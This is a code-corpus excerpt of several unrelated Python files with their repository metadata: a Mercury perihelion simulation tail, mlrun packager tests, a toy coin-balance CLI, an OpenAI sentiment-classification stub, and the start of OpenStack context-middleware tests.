            perihel_N.append(rr_N[k])
            tt_N.append(t[k])
            x_N.append(pvv_N[k, 0])
            y_N.append(pvv_N[k, 1])
    for k in range(1, np.size(rr_E) - 1):
        if rr_E[k] < rr_E[k-1] and rr_E[k] < rr_E[k+1]:
            perihel_E.append(rr_E[k])
            tt_E.append(t[k])
            x_E.append(pvv_E[k, 0])
            y_E.append(pvv_E[k, 1])
    #Progress indicator: print the number of the year just completed.
    teller = teller + 1
    print(teller)
#--------------------------------------------
#Collect the per-year perihelion results from TT years of simulation into
#NumPy arrays for the file output and the plotting below.
#(Removed a large block of dead, commented-out debug code that recomputed
#the same quantities from step indices.)
tt_N = np.asarray(tt_N)
x_N = np.asarray(x_N)
y_N = np.asarray(y_N)
perihel_N = np.asarray(perihel_N)
tt_E = np.asarray(tt_E)
x_E = np.asarray(x_E)
y_E = np.asarray(y_E)
perihel_E = np.asarray(perihel_E)
#Write the final results to file: one line per perihelion passage with its
#time [years] and (x, y) position [AU].  Context managers guarantee the
#files are closed even if a write fails (the original relied on manual
#close() calls with no exception safety).
with open('data5g_N.txt', 'w') as outfile:
    for i in range(np.size(x_N)):
        outfile.write("%2.12f %2.12f %2.12f\n" % (tt_N[i], x_N[i], y_N[i]))
with open('data5g_E.txt', 'w') as outfile:
    for i in range(np.size(x_E)):
        outfile.write("%2.12f %2.12f %2.12f\n" % (tt_E[i], x_E[i], y_E[i]))
#Plot Mercury's orbit after TT years of simulation (both with and without
#relativistic correction) as a sanity check that the trajectories look okay.
plott1 = 'ja'
#Plot only when plott1 == 'ja'
if plott1 == 'ja':
    fig = plt.figure()
    ax = plt.subplot(111)
    ax.plot(pvv_N[:, 0], pvv_N[:, 1], 'b', label='Newton')
    ax.plot(pvv_E[:, 0], pvv_E[:, 1], 'r', label='Einstein')
    #Increase the axis margins and use equal scaling on x and y.
    ax.set_xmargin(0.1)
    ax.axis('equal')
    ax.set_xlabel('x(t) [AU]', fontsize=15)
    ax.set_ylabel('y(t) [AU]', fontsize=15)
    #Fixed title: the original was copy-pasted from an Earth exercise
    #("Planet Earth orbiting 2 times around the Sun") although this figure
    #shows Mercury's orbit.
    ax.set_title('Mercury orbiting the Sun', fontsize=16)
    ax.legend(loc='center', fontsize=14)
    ax.tick_params(labelsize=14)
    plt.show()
| abjurste/A19-FYS4150 | Project5/Project5g.py | Project5g.py | py | 7,275 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": ... |
22355127515 | import ast
import os
import pathlib
import tempfile
from typing import Tuple
from mlrun import MLClientCtx
from mlrun.package.packagers.python_standard_library_packagers import (
BoolPackager,
BytearrayPackager,
BytesPackager,
DictPackager,
FloatPackager,
FrozensetPackager,
IntPackager,
ListPackager,
NonePackager,
PathPackager,
SetPackager,
StrPackager,
TuplePackager,
)
from mlrun.package.utils import ArchiveSupportedFormat, StructFileSupportedFormat
from tests.package.packager_tester import (
COMMON_OBJECT_INSTRUCTIONS,
PackagerTester,
PackTest,
PackToUnpackTest,
UnpackTest,
)
# ----------------------------------------------------------------------------------------------------------------------
# builtins packagers:
# ----------------------------------------------------------------------------------------------------------------------
# TODO: Replace with types.NoneType once Python >= 3.10 is the floor.
NoneType = type(None)


def pack_none() -> NoneType:
    """Return the `None` sample."""
    return None


def validate_none(result: NoneType) -> bool:
    """Check the logged result for the `None` sample.

    None results are currently cast to the string "None" when logged (see
    `execution._cast_result`); switch to `result is None` once that changes.
    """
    return result == "None"


class NonePackagerTester(PackagerTester):
    """Tester covering the `NonePackager`."""

    PACKAGER_IN_TEST = NonePackager()
    TESTS = [
        PackTest(pack_handler="pack_none", log_hint="my_result", validation_function=validate_none),
        PackToUnpackTest(pack_handler="pack_none", log_hint="my_result"),
    ]
_INT_SAMPLE = 7


def pack_int() -> int:
    """Return the constant `int` sample."""
    return _INT_SAMPLE


def validate_int(result: int) -> bool:
    """Check that a logged result equals the `int` sample."""
    return result == _INT_SAMPLE


def unpack_int(obj: int):
    """Assert that an unpacked object is the original `int` sample."""
    assert isinstance(obj, int)
    assert obj == _INT_SAMPLE


class IntPackagerTester(PackagerTester):
    """Tester covering the `IntPackager`."""

    PACKAGER_IN_TEST = IntPackager()
    TESTS = [
        PackTest(pack_handler="pack_int", log_hint="my_result", validation_function=validate_int),
        PackToUnpackTest(pack_handler="pack_int", log_hint="my_result"),
        PackToUnpackTest(
            pack_handler="pack_int",
            log_hint="my_result: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": int.__module__},
            unpack_handler="unpack_int",
        ),
    ]
_FLOAT_SAMPLE = 0.97123


def pack_float() -> float:
    """Return the constant `float` sample."""
    return _FLOAT_SAMPLE


def validate_float(result: float) -> bool:
    """Check that a logged result equals the `float` sample."""
    return result == _FLOAT_SAMPLE


def unpack_float(obj: float):
    """Assert that an unpacked object is the original `float` sample."""
    assert isinstance(obj, float)
    assert obj == _FLOAT_SAMPLE


class FloatPackagerTester(PackagerTester):
    """Tester covering the `FloatPackager`."""

    PACKAGER_IN_TEST = FloatPackager()
    TESTS = [
        PackTest(pack_handler="pack_float", log_hint="my_result", validation_function=validate_float),
        PackToUnpackTest(pack_handler="pack_float", log_hint="my_result"),
        PackToUnpackTest(
            pack_handler="pack_float",
            log_hint="my_result: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": float.__module__},
            unpack_handler="unpack_float",
        ),
    ]
_BOOL_SAMPLE = True


def pack_bool() -> bool:
    """Return the constant `bool` sample.

    Note: the return annotation was previously ``float`` (copy-paste from the
    float section); it is ``bool``, matching the returned value and every
    other sample packer in this module.
    """
    return _BOOL_SAMPLE


def validate_bool(result: bool) -> bool:
    """Check that a logged result is (identically) the `bool` sample."""
    return result is _BOOL_SAMPLE


def unpack_bool(obj: bool):
    """Assert that an unpacked object is the original `bool` sample."""
    assert isinstance(obj, bool)
    assert obj is _BOOL_SAMPLE


class BoolPackagerTester(PackagerTester):
    """Tester covering the `BoolPackager`."""

    PACKAGER_IN_TEST = BoolPackager()
    TESTS = [
        PackTest(pack_handler="pack_bool", log_hint="my_result", validation_function=validate_bool),
        PackToUnpackTest(pack_handler="pack_bool", log_hint="my_result"),
        PackToUnpackTest(
            pack_handler="pack_bool",
            log_hint="my_result: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": bool.__module__},
            unpack_handler="unpack_bool",
        ),
    ]
_STR_RESULT_SAMPLE = "I'm a string."
_STR_FILE_SAMPLE = "Something written in a file..."
_STR_DIRECTORY_FILES_SAMPLE = "I'm text file number {}"


def pack_str() -> str:
    """Return the constant `str` sample."""
    return _STR_RESULT_SAMPLE


def pack_str_path_file(context: MLClientCtx) -> str:
    """Write the file sample into the run's artifact path; return its path."""
    path = os.path.join(context.artifact_path, "my_file.txt")
    with open(path, "w") as stream:
        stream.write(_STR_FILE_SAMPLE)
    return path


def pack_str_path_directory(context: MLClientCtx) -> str:
    """Create a directory of five sample text files; return its path."""
    directory = os.path.join(context.artifact_path, "my_directory")
    os.makedirs(directory)
    for index in range(5):
        with open(os.path.join(directory, f"file_{index}.txt"), "w") as stream:
            stream.write(_STR_DIRECTORY_FILES_SAMPLE.format(index))
    return directory


def validate_str_result(result: str) -> bool:
    """Check that a logged result equals the `str` sample."""
    return result == _STR_RESULT_SAMPLE


def unpack_str(obj: str):
    """Assert that an unpacked object is the original `str` sample."""
    assert isinstance(obj, str)
    assert obj == _STR_RESULT_SAMPLE


def unpack_str_path_file(obj: str):
    """Assert that an unpacked path points at a file holding the file sample."""
    assert isinstance(obj, str)
    with open(obj, "r") as stream:
        assert stream.read() == _STR_FILE_SAMPLE


def unpack_str_path_directory(obj: str):
    """Assert that an unpacked path points at the five-file sample directory."""
    assert isinstance(obj, str)
    for index in range(5):
        with open(os.path.join(obj, f"file_{index}.txt"), "r") as stream:
            assert stream.read() == _STR_DIRECTORY_FILES_SAMPLE.format(index)


def prepare_str_path_file() -> Tuple[str, str]:
    """Create a temp file holding the file sample; return (file path, temp dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, "my_file.txt")
    with open(path, "w") as stream:
        stream.write(_STR_FILE_SAMPLE)
    return path, tmp_dir


class StrPackagerTester(PackagerTester):
    """Tester covering the `StrPackager`."""

    PACKAGER_IN_TEST = StrPackager()
    TESTS = [
        PackTest(
            pack_handler="pack_str",
            log_hint="my_result",
            validation_function=validate_str_result,
            pack_parameters={},
        ),
        UnpackTest(prepare_input_function=prepare_str_path_file, unpack_handler="unpack_str_path_file"),
        PackToUnpackTest(pack_handler="pack_str", log_hint="my_result"),
        PackToUnpackTest(
            pack_handler="pack_str",
            log_hint="my_result: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": str.__module__},
            unpack_handler="unpack_str",
        ),
        PackToUnpackTest(
            pack_handler="pack_str_path_file",
            log_hint="my_file: path",
            expected_instructions={"is_directory": False},
            unpack_handler="unpack_str_path_file",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_str_path_directory",
                log_hint={"key": "my_dir", "artifact_type": "path", "archive_format": fmt},
                expected_instructions={"is_directory": True, "archive_format": fmt},
                unpack_handler="unpack_str_path_directory",
            )
            for fmt in ArchiveSupportedFormat.get_all_formats()
        ],
    ]
_DICT_SAMPLE = {"a1": {"a2": [1, 2, 3], "b2": [4, 5, 6]}, "b1": {"b2": [4, 5, 6]}}


def pack_dict() -> dict:
    """Return the constant `dict` sample."""
    return _DICT_SAMPLE


def unpack_dict(obj: dict):
    """Assert that an unpacked object equals the `dict` sample."""
    assert isinstance(obj, dict)
    assert obj == _DICT_SAMPLE


def validate_dict_result(result: dict) -> bool:
    """Check that a logged result equals the `dict` sample."""
    return result == _DICT_SAMPLE


def prepare_dict_file(file_format: str) -> Tuple[str, str]:
    """Serialize the dict sample to a temp file; return (file path, temp dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=_DICT_SAMPLE, file_path=path)
    return path, tmp_dir


class DictPackagerTester(PackagerTester):
    """Tester covering the `DictPackager`."""

    PACKAGER_IN_TEST = DictPackager()
    TESTS = [
        PackTest(pack_handler="pack_dict", log_hint="my_dict", validation_function=validate_dict_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_dict_file,
                unpack_handler="unpack_dict",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_dict", log_hint="my_dict"),
        PackToUnpackTest(
            pack_handler="pack_dict",
            log_hint="my_dict: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": dict.__module__},
            unpack_handler="unpack_dict",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_dict",
                log_hint={"key": "my_dict", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_dict",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_LIST_SAMPLE = [1, 2, 3, {"a": 1, "b": 2}]


def pack_list() -> list:
    """Return the constant `list` sample."""
    return _LIST_SAMPLE


def unpack_list(obj: list):
    """Assert that an unpacked object equals the `list` sample."""
    assert isinstance(obj, list)
    assert obj == _LIST_SAMPLE


def validate_list_result(result: list) -> bool:
    """Check that a logged result equals the `list` sample."""
    return result == _LIST_SAMPLE


def prepare_list_file(file_format: str) -> Tuple[str, str]:
    """Serialize the list sample to a temp file; return (file path, temp dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=_LIST_SAMPLE, file_path=path)
    return path, tmp_dir


class ListPackagerTester(PackagerTester):
    """Tester covering the `ListPackager`."""

    PACKAGER_IN_TEST = ListPackager()
    TESTS = [
        PackTest(pack_handler="pack_list", log_hint="my_list", validation_function=validate_list_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_list_file,
                unpack_handler="unpack_list",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_list", log_hint="my_list"),
        PackToUnpackTest(
            pack_handler="pack_list",
            log_hint="my_list: object",
            # Fixed: this read `tuple.__module__` (copy-paste from the tuple
            # section).  Same runtime value ("builtins"), but misleading.
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": list.__module__},
            unpack_handler="unpack_list",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_list",
                log_hint={"key": "my_list", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_list",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_TUPLE_SAMPLE = (1, 2, 3)


def pack_tuple() -> tuple:
    """Return the constant `tuple` sample."""
    return _TUPLE_SAMPLE


def unpack_tuple(obj: tuple):
    """Assert that an unpacked object equals the `tuple` sample."""
    assert isinstance(obj, tuple)
    assert obj == _TUPLE_SAMPLE


def validate_tuple_result(result: list) -> bool:
    """Check a logged result against the sample (tuples are logged as lists)."""
    return tuple(result) == _TUPLE_SAMPLE


def prepare_tuple_file(file_format: str) -> Tuple[str, str]:
    """Serialize the tuple sample (as a list) to a temp file; return (file, dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=list(_TUPLE_SAMPLE), file_path=path)
    return path, tmp_dir


class TuplePackagerTester(PackagerTester):
    """Tester covering the `TuplePackager`."""

    PACKAGER_IN_TEST = TuplePackager()
    TESTS = [
        PackTest(pack_handler="pack_tuple", log_hint="my_tuple", validation_function=validate_tuple_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_tuple_file,
                unpack_handler="unpack_tuple",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_tuple", log_hint="my_tuple"),
        PackToUnpackTest(
            pack_handler="pack_tuple",
            log_hint="my_tuple: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": tuple.__module__},
            unpack_handler="unpack_tuple",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_tuple",
                log_hint={"key": "my_tuple", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_tuple",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_SET_SAMPLE = {1, 2, 3}


def pack_set() -> set:
    """Return the constant `set` sample."""
    return _SET_SAMPLE


def unpack_set(obj: set):
    """Assert that an unpacked object equals the `set` sample."""
    assert isinstance(obj, set)
    assert obj == _SET_SAMPLE


def validate_set_result(result: list) -> bool:
    """Check a logged result against the sample (sets are logged as lists)."""
    return set(result) == _SET_SAMPLE


def prepare_set_file(file_format: str) -> Tuple[str, str]:
    """Serialize the set sample (as a list) to a temp file; return (file, dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=list(_SET_SAMPLE), file_path=path)
    return path, tmp_dir


class SetPackagerTester(PackagerTester):
    """Tester covering the `SetPackager`."""

    PACKAGER_IN_TEST = SetPackager()
    TESTS = [
        PackTest(pack_handler="pack_set", log_hint="my_set", validation_function=validate_set_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_set_file,
                unpack_handler="unpack_set",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_set", log_hint="my_set"),
        PackToUnpackTest(
            pack_handler="pack_set",
            log_hint="my_set: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": set.__module__},
            unpack_handler="unpack_set",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_set",
                log_hint={"key": "my_set", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_set",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_FROZENSET_SAMPLE = frozenset([1, 2, 3])


def pack_frozenset() -> frozenset:
    """Return the constant `frozenset` sample."""
    return _FROZENSET_SAMPLE


def unpack_frozenset(obj: frozenset):
    """Assert that an unpacked object equals the `frozenset` sample."""
    assert isinstance(obj, frozenset)
    assert obj == _FROZENSET_SAMPLE


def validate_frozenset_result(result: list) -> bool:
    """Check a logged result against the sample (frozensets are logged as lists)."""
    return frozenset(result) == _FROZENSET_SAMPLE


def prepare_frozenset_file(file_format: str) -> Tuple[str, str]:
    """Serialize the frozenset sample (as a list) to a temp file; return (file, dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=list(_FROZENSET_SAMPLE), file_path=path)
    return path, tmp_dir


class FrozensetPackagerTester(PackagerTester):
    """Tester covering the `FrozensetPackager`."""

    PACKAGER_IN_TEST = FrozensetPackager()
    TESTS = [
        PackTest(pack_handler="pack_frozenset", log_hint="my_frozenset", validation_function=validate_frozenset_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_frozenset_file,
                unpack_handler="unpack_frozenset",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_frozenset", log_hint="my_frozenset"),
        PackToUnpackTest(
            pack_handler="pack_frozenset",
            log_hint="my_frozenset: object",
            # Fixed: this read `set.__module__` (copy-paste from the set
            # section).  Same runtime value ("builtins"), but misleading.
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": frozenset.__module__},
            unpack_handler="unpack_frozenset",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_frozenset",
                log_hint={"key": "my_frozenset", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_frozenset",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_BYTEARRAY_SAMPLE = bytearray([1, 2, 3])


def pack_bytearray() -> bytearray:
    """Return the constant `bytearray` sample."""
    return _BYTEARRAY_SAMPLE


def unpack_bytearray(obj: bytearray):
    """Assert that an unpacked object equals the `bytearray` sample."""
    assert isinstance(obj, bytearray)
    assert obj == _BYTEARRAY_SAMPLE


def validate_bytearray_result(result: str) -> bool:
    """Check a logged result (byte arrays are logged as their string repr)."""
    return bytearray(ast.literal_eval(result)) == _BYTEARRAY_SAMPLE


def prepare_bytearray_file(file_format: str) -> Tuple[str, str]:
    """Serialize the bytearray sample (as a list) to a temp file; return (file, dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=list(_BYTEARRAY_SAMPLE), file_path=path)
    return path, tmp_dir


class BytearrayPackagerTester(PackagerTester):
    """Tester covering the `BytearrayPackager`."""

    PACKAGER_IN_TEST = BytearrayPackager()
    TESTS = [
        PackTest(pack_handler="pack_bytearray", log_hint="my_bytearray", validation_function=validate_bytearray_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_bytearray_file,
                unpack_handler="unpack_bytearray",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_bytearray", log_hint="my_bytearray"),
        PackToUnpackTest(
            pack_handler="pack_bytearray",
            log_hint="my_bytearray: object",
            # Fixed: this read `set.__module__` (copy-paste).  Same runtime
            # value ("builtins"), but misleading.
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": bytearray.__module__},
            unpack_handler="unpack_bytearray",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_bytearray",
                log_hint={"key": "my_bytearray", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_bytearray",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
_BYTES_SAMPLE = b"I'm a byte string."


def pack_bytes() -> bytes:
    """Return the constant `bytes` sample."""
    return _BYTES_SAMPLE


def unpack_bytes(obj: bytes):
    """Assert that an unpacked object equals the `bytes` sample."""
    assert isinstance(obj, bytes)
    assert obj == _BYTES_SAMPLE


def validate_bytes_result(result: str) -> bool:
    """Check a logged result (bytes are logged as their string repr)."""
    return ast.literal_eval(result) == _BYTES_SAMPLE


def prepare_bytes_file(file_format: str) -> Tuple[str, str]:
    """Serialize the bytes sample (as a list) to a temp file; return (file, dir)."""
    tmp_dir = tempfile.mkdtemp()
    path = os.path.join(tmp_dir, f"my_file.{file_format}")
    handler = StructFileSupportedFormat.get_format_handler(fmt=file_format)
    handler.write(obj=list(_BYTES_SAMPLE), file_path=path)
    return path, tmp_dir


class BytesPackagerTester(PackagerTester):
    """Tester covering the `BytesPackager`."""

    PACKAGER_IN_TEST = BytesPackager()
    TESTS = [
        PackTest(pack_handler="pack_bytes", log_hint="my_bytes", validation_function=validate_bytes_result),
        *[
            UnpackTest(
                prepare_input_function=prepare_bytes_file,
                unpack_handler="unpack_bytes",
                prepare_parameters={"file_format": fmt},
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
        PackToUnpackTest(pack_handler="pack_bytes", log_hint="my_bytes"),
        PackToUnpackTest(
            pack_handler="pack_bytes",
            log_hint="my_bytes: object",
            # Fixed: this read `set.__module__` (copy-paste).  Same runtime
            # value ("builtins"), but misleading.
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": bytes.__module__},
            unpack_handler="unpack_bytes",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_bytes",
                log_hint={"key": "my_bytes", "artifact_type": "file", "file_format": fmt},
                expected_instructions={"file_format": fmt},
                unpack_handler="unpack_bytes",
            )
            for fmt in StructFileSupportedFormat.get_all_formats()
        ],
    ]
# ----------------------------------------------------------------------------------------------------------------------
# pathlib packagers:
# ----------------------------------------------------------------------------------------------------------------------
_PATH_RESULT_SAMPLE = pathlib.Path("I'm a path.")


def pack_path() -> pathlib.Path:
    """Return the constant `pathlib.Path` sample."""
    return _PATH_RESULT_SAMPLE


def pack_path_file(context: MLClientCtx) -> pathlib.Path:
    """Write the file sample into the run's artifact path; return its Path."""
    path = pathlib.Path(context.artifact_path) / "my_file.txt"
    with open(path, "w") as stream:
        stream.write(_STR_FILE_SAMPLE)
    return path


def pack_path_directory(context: MLClientCtx) -> pathlib.Path:
    """Create a directory of five sample text files; return its Path."""
    directory = pathlib.Path(context.artifact_path) / "my_directory"
    os.makedirs(directory)
    for index in range(5):
        with open(directory / f"file_{index}.txt", "w") as stream:
            stream.write(_STR_DIRECTORY_FILES_SAMPLE.format(index))
    return directory


def validate_path_result(result: pathlib.Path) -> bool:
    """Check that a logged result equals the `Path` sample."""
    return pathlib.Path(result) == _PATH_RESULT_SAMPLE


def unpack_path(obj: pathlib.Path):
    """Assert that an unpacked object is the original `Path` sample."""
    assert isinstance(obj, pathlib.Path)
    assert obj == _PATH_RESULT_SAMPLE


def unpack_path_file(obj: pathlib.Path):
    """Assert that an unpacked Path points at a file holding the file sample."""
    assert isinstance(obj, pathlib.Path)
    with open(obj, "r") as stream:
        assert stream.read() == _STR_FILE_SAMPLE


def unpack_path_directory(obj: pathlib.Path):
    """Assert that an unpacked Path points at the five-file sample directory."""
    assert isinstance(obj, pathlib.Path)
    for index in range(5):
        with open(obj / f"file_{index}.txt", "r") as stream:
            assert stream.read() == _STR_DIRECTORY_FILES_SAMPLE.format(index)


class PathPackagerTester(PackagerTester):
    """Tester covering the `PathPackager`."""

    PACKAGER_IN_TEST = PathPackager()
    TESTS = [
        PackTest(
            pack_handler="pack_path",
            log_hint="my_result: result",
            validation_function=validate_path_result,
            pack_parameters={},
        ),
        # Reuses the `str` preparer - the prepared input is a plain path string.
        UnpackTest(prepare_input_function=prepare_str_path_file, unpack_handler="unpack_path_file"),
        PackToUnpackTest(pack_handler="pack_path", log_hint="my_result: result"),
        PackToUnpackTest(
            pack_handler="pack_path",
            log_hint="my_result: object",
            expected_instructions={**COMMON_OBJECT_INSTRUCTIONS, "object_module_name": pathlib.Path.__module__},
            unpack_handler="unpack_path",
        ),
        PackToUnpackTest(
            pack_handler="pack_path_file",
            log_hint="my_file",
            expected_instructions={"is_directory": False},
            unpack_handler="unpack_path_file",
        ),
        *[
            PackToUnpackTest(
                pack_handler="pack_path_directory",
                log_hint={"key": "my_dir", "archive_format": fmt},
                expected_instructions={"is_directory": True, "archive_format": fmt},
                unpack_handler="unpack_path_directory",
            )
            for fmt in ArchiveSupportedFormat.get_all_formats()
        ],
    ]
| mlrun/mlrun | tests/package/packagers_testers/python_standard_library_packagers_testers.py | python_standard_library_packagers_testers.py | py | 27,189 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "tests.package.packager_tester.PackagerTester",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "mlrun.package.packagers.python_standard_library_packagers.NonePackager",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "tests.package.packager_tester... |
40851263636 | import json
def help():
    """Print the list of available commands, then return to the prompt.

    NOTE: the name shadows the built-in ``help()``; kept for compatibility
    with the dispatch in ``main()``.
    """
    # The original bound print()'s (always-None) return value to an unused
    # variable; just print.
    print("""
addcoins: plus Your coins.
minuscoins: minus Your coins.
help: shows this list.
coins: Shows how many coins do you have
""")
    main()
def checkbalance():
    """Print the user's current coin balance, then return to the prompt."""
    # Reuse the shared loader instead of re-parsing coins.json here; the
    # original also shadowed the get_balance() function with a local dict
    # of the same name.
    balance = get_balance()
    print(f"You Have {balance['coins']} coins")
    main()
def addcoins():
    """Prompt for an amount, add it to the stored balance and persist it."""
    balance = get_balance()
    amount = int(input("Enter a amount to add coins: "))
    balance['coins'] += amount
    with open('coins.json', 'w') as f:
        json.dump(balance, f)
    print("Add sucessfull")
    main()
def minuscoins():
    """Prompt for an amount, subtract it from the stored balance and persist it."""
    balance = get_balance()
    amount = int(input("Enter a amount to minus coins: "))
    balance['coins'] -= amount
    with open('coins.json', 'w') as f:
        json.dump(balance, f)
    print("Minus sucessfull")
    main()
def get_balance():
    """Load and return the persisted balance dict from coins.json."""
    with open('coins.json', 'r') as fh:
        return json.load(fh)
def main():
    """Read one command from the user and dispatch it to its handler."""
    command = input("Input a Command(Type help for help): ")
    handlers = {
        "help": help,
        "coins": checkbalance,
        "addcoins": addcoins,
        "minuscoins": minuscoins,
    }
    action = handlers.get(command)
    if action is not None:
        action()
    else:
        print("Command Not Found")
        main()


# Start the command loop.
main()
| hahayeslol12/CoinScript | main.py | main.py | py | 1,455 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.loads",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 42,
... |
29654851332 | """ A python program that scrapes news articles, classifies their sentiment, and creates a time series of sentiment over time """
import os
import openai
# Read the OpenAI API key from the environment; falls back to an empty
# string, in which case API calls will fail with an authentication error
# until OPENAI_API_KEY is set.
openai.api_key = os.environ.get('OPENAI_API_KEY', '')
def classify(query, search_model="ada", model="davinci"):
    """Classify the sentiment of `query` with the OpenAI classification API.

    Returns the API response object (the original discarded it, so callers
    could never see the predicted label).

    Fixes: a missing comma between "Mostly Negative" and "Very Negative"
    silently concatenated the two adjacent string literals into the single
    label "Mostly NegativeVery Negative".
    """
    return openai.Classification.create(
        search_model=search_model,
        model=model,
        # TODO: supply real labeled examples; empty strings are placeholders.
        examples=[
            [""],
            [""],
            [""],
            [""],
        ],
        query=query,
        labels=[
            "Very Positive",
            "Mostly Positive",
            "Neutral",
            "Mostly Negative",
            "Very Negative",
        ],
    )
if __name__ == "__main__":
    # Smoke check: list the models visible to the configured API key.
    print(openai.Model.list())
{
"api_name": "openai.api_key",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "openai.Classification... |
74470182182 | import unittest
import mock
import openstack.common.context
from openstack.common.middleware import context
class ContextMiddlewareTest(unittest.TestCase):
    """Unit tests for context.ContextMiddleware."""

    def test_process_request(self):
        # process_request() must attach the context built by make_context()
        # to the incoming request.
        req = mock.Mock()
        fake_ctx = mock.sentinel.context
        patched = mock.patch.object(context.ContextMiddleware,
                                    'make_context',
                                    mock.Mock(return_value=fake_ctx))
        with patched:
            middleware = context.ContextMiddleware(mock.Mock(), mock.MagicMock())
            middleware.process_request(req)
            self.assertEqual(req.context, fake_ctx)

    def test_make_context(self):
        # make_context() should forward its arguments straight to the
        # default RequestContext constructor.
        patched = mock.patch.object(openstack.common.context.RequestContext,
                                    '__init__',
                                    mock.Mock(return_value=None))
        with patched as init:
            middleware = context.ContextMiddleware(mock.Mock(), mock.MagicMock())
            middleware.make_context(mock.sentinel.arg)
            init.assert_called_with(mock.sentinel.arg)

    def test_make_explicit_context(self):
        # With an explicit 'context_class' option, the class named there is
        # imported and used to build the context instead of the default.
